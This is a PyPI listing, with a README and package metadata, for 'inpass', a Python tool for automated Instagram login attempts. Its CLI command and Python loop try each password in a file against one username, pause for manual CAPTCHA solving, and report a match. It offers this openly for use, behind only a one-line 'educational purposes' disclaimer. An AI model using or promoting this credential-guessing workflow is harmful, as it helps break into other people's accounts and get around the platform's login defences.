inpass


Nameinpass JSON
Version 1.1.1 PyPI version JSON
download
home_pagehttps://mrfidal.in
SummaryAutomated login attempts for Instagram.
upload_time2024-07-02 11:14:34
maintainerNone
docs_urlNone
authorFidal
requires_pythonNone
licenseNone
keywords
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            #  inpass 1.1.1

`inpass` is a Python package designed for automated login attempts on Instagram. This package can help automate the login process using multiple passwords, handle CAPTCHA challenges, and track URL changes during login attempts.

## Features

- Automated login attempts for Instagram.
- Handles CAPTCHA challenges by pausing and allowing manual resolution.
- Tracks URL changes during the login process.
- Command-line interface (CLI) and programmatic usage supported.

## Installation

You can install the package using `pip`:

```bash
pip install inpass
```

## Usage

### Command-line Interface
- You can use the inpass package directly from the command line. Here’s how:
```bash
inpass --username your_username --password-file passwords.txt
```

### Programmatic Usage
- You can also use the inpass package programmatically in your Python scripts. Below is an example:

```python
import time
import inpass

username = "your_username"
password_file = "passwords.txt"

with open(password_file, 'r') as file:
    passwords = file.read().splitlines()

for password in passwords:
    if inpass.login(username, password):
        print(f"Password match: {password}")
        break
    else:
        print(f"Password {password} not matching")
    time.sleep(1)
else:
    print("All passwords failed.")
```
## License
This project is licensed under the MIT License. See the LICENSE file for details.

### Acknowledgments
Thank you to all the contributors and users who have supported the development of this project.

#### Disclaimer
This package is intended for educational and research purposes only. The author is not responsible for any misuse of this software.

- Thank you for using inpass. We hope it helps you automate your login attempts efficiently.

            

Raw data

            {
    "_id": null,
    "home_page": "https://mrfidal.in",
    "name": "inpass",
    "maintainer": null,
    "docs_url": null,
    "requires_python": null,
    "maintainer_email": null,
    "keywords": null,
    "author": "Fidal",
    "author_email": "mrfidal@proton.me",
    "download_url": "https://files.pythonhosted.org/packages/82/d9/169428d45ef0e2649308ee58c4837077b46bfea0e6d13a0bd19f81a3fa67/inpass-1.1.1.tar.gz",
    "platform": null,
    "description": "#  inpass 1.1.1\r\n\r\n`inpass` is a Python package designed for automated login attempts on Instagram. This package can help automate the login process using multiple passwords, handle CAPTCHA challenges, and track URL changes during login attempts.\r\n\r\n## Features\r\n\r\n- Automated login attempts for Instagram.\r\n- Handles CAPTCHA challenges by pausing and allowing manual resolution.\r\n- Tracks URL changes during the login process.\r\n- Command-line interface (CLI) and programmatic usage supported.\r\n\r\n## Installation\r\n\r\nYou can install the package using `pip`:\r\n\r\n```bash\r\npip install inpass\r\n```\r\n\r\n## Usage\r\n\r\n### Command-line Interface\r\n- You can use the inpass package directly from the command line. Here\u2019s how:\r\n```bash\r\ninpass --username your_username --password-file passwords.txt\r\n```\r\n\r\n### Programmatic Usage\r\n- You can also use the inpass package programmatically in your Python scripts. Below is an example:\r\n\r\n```python\r\nimport time\r\nimport inpass\r\n\r\nusername = \"your_username\"\r\npassword_file = \"passwords.txt\"\r\n\r\nwith open(password_file, 'r') as file:\r\n    passwords = file.read().splitlines()\r\n\r\nfor password in passwords:\r\n    if inpass.login(username, password):\r\n        print(f\"Password match: {password}\")\r\n        break\r\n    else:\r\n        print(f\"Password {password} not matching\")\r\n    time.sleep(1)\r\nelse:\r\n    print(\"All passwords failed.\")\r\n```\r\n## License\r\nThis project is licensed under the MIT License. See the LICENSE file for details.\r\n\r\n### Acknowledgments\r\nThank you to all the contributors and users who have supported the development of this project.\r\n\r\n#### Disclaimer\r\nThis package is intended for educational and research purposes only. The author is not responsible for any misuse of this software.\r\n\r\n- Thank you for using inpass. We hope it helps you automate your login attempts efficiently.\r\n",
    "bugtrack_url": null,
    "license": null,
    "summary": "Automated login attempts for Instagram.",
    "version": "1.1.1",
    "project_urls": {
        "Homepage": "https://mrfidal.in"
    },
    "split_keywords": [],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "97363e90eec52b453dd401eaf939fcfaa6da51d17a67eb0f95d11a5bab0f67b9",
                "md5": "1a27886e6bb974b9618737db9f26f17d",
                "sha256": "ef06e7fd720112d5da42a9fd5767c718f1392b6f81ba2f6978b967d139c0e1b4"
            },
            "downloads": -1,
            "filename": "inpass-1.1.1-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "1a27886e6bb974b9618737db9f26f17d",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": null,
            "size": 4724,
            "upload_time": "2024-07-02T11:14:32",
            "upload_time_iso_8601": "2024-07-02T11:14:32.339177Z",
            "url": "https://files.pythonhosted.org/packages/97/36/3e90eec52b453dd401eaf939fcfaa6da51d17a67eb0f95d11a5bab0f67b9/inpass-1.1.1-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "82d9169428d45ef0e2649308ee58c4837077b46bfea0e6d13a0bd19f81a3fa67",
                "md5": "c67150173ae25b09286049468c85aea4",
                "sha256": "fc80867370dfb96e682e93a4dd5744c28a9996e2d0f0fdd804d70f53432095af"
            },
            "downloads": -1,
            "filename": "inpass-1.1.1.tar.gz",
            "has_sig": false,
            "md5_digest": "c67150173ae25b09286049468c85aea4",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 4002,
            "upload_time": "2024-07-02T11:14:34",
            "upload_time_iso_8601": "2024-07-02T11:14:34.202106Z",
            "url": "https://files.pythonhosted.org/packages/82/d9/169428d45ef0e2649308ee58c4837077b46bfea0e6d13a0bd19f81a3fa67/inpass-1.1.1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-07-02 11:14:34",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "inpass"
}
        
Elapsed time: 0.54312s